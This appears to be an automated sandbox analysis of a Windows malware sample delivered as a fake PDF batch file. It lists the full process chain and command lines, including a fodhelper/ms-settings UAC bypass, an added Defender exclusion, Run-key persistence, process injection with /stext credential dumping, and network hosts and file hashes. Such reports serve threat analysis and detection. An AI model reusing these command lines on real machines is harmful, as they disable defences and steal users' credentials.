| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" | C:\Users\Public\Libraries\Lewxa.com | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3076 set thread context of 3100 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
| PID 3076 set thread context of 4832 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
| PID 3076 set thread context of 4600 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\colorcpl.exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\ms-settings\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"
C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Windows \System32\5815154.exe"
C:\Windows \System32\5815154.exe
"C:\Windows \System32\5815154.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
C:\Windows\system32\cmd.exe
cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\rbyjenotevvhjlrzoqscdbyxxnizrfj"
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\bwdtefhuadnulrfdxbeeggsgfbaikqajhn"
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\dyjmfyr"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3076 -ip 3076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1336
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| GB | 2.20.37.224:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 224.37.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1010.filemail.com | udp |
| US | 23.237.50.106:443 | 1010.filemail.com | tcp |
| US | 23.237.50.106:443 | 1010.filemail.com | tcp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.50.237.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.135.221.88.in-addr.arpa | udp |
| N/A | 127.0.0.1:45671 | tcp | |
| N/A | 127.0.0.1:55677 | tcp | |
| US | 192.3.101.8:55677 | tcp | |
| US | 8.8.8.8:53 | 8.101.3.192.in-addr.arpa | udp |
| US | 192.3.101.8:55677 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| GB | 88.221.135.203:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mfdxhplo.amo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1060-26-0x0000018E58320000-0x0000018E58342000-memory.dmp
memory/1060-27-0x00007FFFCC980000-0x00007FFFCD441000-memory.dmp
memory/1060-28-0x0000018E56130000-0x0000018E56140000-memory.dmp
memory/1060-29-0x0000018E56130000-0x0000018E56140000-memory.dmp
memory/1060-34-0x00007FFFCC980000-0x00007FFFCD441000-memory.dmp
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\Lewxa.txt
| MD5 | 8f6b3132069a25963b93083743e160dd |
| SHA1 | 364112fc579f11dfa82a3c1078ec19706cd6dfda |
| SHA256 | 5184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c |
| SHA512 | af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938 |
C:\Users\Public\Libraries\Lewxa.com
| MD5 | f91a42a0ac8e732cc8e738d5cfc13846 |
| SHA1 | 8c56e9205b890e1f525654d034e8397dd678397a |
| SHA256 | 11bdcc579de174102aa8f5a12d1b07cb426339de1298770e4d178e5e21578346 |
| SHA512 | 71133cda567802ad0c2743c5bcceae5ba85ed0b2b2c655680d81fcea661a8740a6b3fbe5a4f698be59b28c63a19ae58be4f39bade92be59065fcccdf6dcdcf33 |
C:\Users\Public\Libraries\Lewxa.com
| MD5 | 2cba0b95d09cf0d987c85d35530f0db1 |
| SHA1 | c88af87cb96ee50f0de0eb945d42049494437903 |
| SHA256 | c834790138bc3d7a21ba1b9022c11b1855173e8b43c8d30bf547b336e47a63b7 |
| SHA512 | 59cabe6304003ae99a131a71fddee5179afac92fd7221de79fed4b106ee675ccf80a2f1e0e0a2533a6d04d29bea549260719149010955a5892c1d9439e8db0f6 |
memory/4588-48-0x00000000021C0000-0x00000000021C1000-memory.dmp
memory/4588-50-0x0000000003F30000-0x0000000004F30000-memory.dmp
memory/4588-52-0x0000000003F30000-0x0000000004F30000-memory.dmp
memory/4588-59-0x0000000000400000-0x0000000000527000-memory.dmp
C:\Windows \System32\5815154.exe
| MD5 | 231ce1e1d7d98b44371ffff407d68b59 |
| SHA1 | 25510d0f6353dbf0c9f72fc880de7585e34b28ff |
| SHA256 | 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96 |
| SHA512 | 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612 |
C:\Windows \System32\netutils.dll
| MD5 | fa7aa88417d0c48807144a1a48fe3fbc |
| SHA1 | 6f5ec990b12d4a6075050a94e0d68d03781fa46d |
| SHA256 | 2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098 |
| SHA512 | 99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff |
memory/2960-71-0x00000000613C0000-0x00000000613E3000-memory.dmp
C:\windows \system32\KDECO.bat
| MD5 | c545650595b479c81ad6b9d8882aae39 |
| SHA1 | 7a98aa2e6eee23b3c1bba876955d525bc618b3f0 |
| SHA256 | a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9 |
| SHA512 | 85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3 |
memory/4776-73-0x00007FFFCAAF0000-0x00007FFFCB5B1000-memory.dmp
memory/4588-75-0x00000000021C0000-0x00000000021C1000-memory.dmp
memory/4776-74-0x0000022CD18B0000-0x0000022CD18C0000-memory.dmp
memory/4776-76-0x0000022CD18B0000-0x0000022CD18C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
memory/4776-89-0x00007FFFCAAF0000-0x00007FFFCB5B1000-memory.dmp
C:\Users\Public\Libraries\Koomxsve.PIF
| MD5 | 04aba5a372c8dac9affd6f1578b478b3 |
| SHA1 | 1e0d764539cbf2e86e0d59b83f407b429f61fdb7 |
| SHA256 | b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411 |
| SHA512 | 4d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3 |
memory/3076-96-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-98-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-99-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-100-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-101-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-104-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-106-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-107-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-108-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-109-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3076-111-0x0000000000B70000-0x0000000001B70000-memory.dmp
memory/3100-117-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4832-116-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4600-120-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4832-122-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4600-124-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4832-132-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4600-131-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4600-130-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4832-129-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3100-121-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3100-114-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3100-134-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3076-136-0x0000000020540000-0x0000000020559000-memory.dmp
memory/3076-139-0x0000000020540000-0x0000000020559000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rbyjenotevvhjlrzoqscdbyxxnizrfj
| MD5 | 63a3d218b0d233efc9806729feba705a |
| SHA1 | 3cda6c59e0b8115d8538c8ff0d94a49294d516ac |
| SHA256 | 66ceb453b5931baa8d942d514cc1dcc41a24ab59313c0621daa9920bd0566bfd |
| SHA512 | d0cfb106b57a4e90523c194d073a131bc65461d8e792b0be51aef89aa413dded53c2aba723fc677f68b1211411a0e105b5771cafa045d3e11d54db578577b683 |
memory/3076-141-0x0000000000B70000-0x0000000001B70000-memory.dmp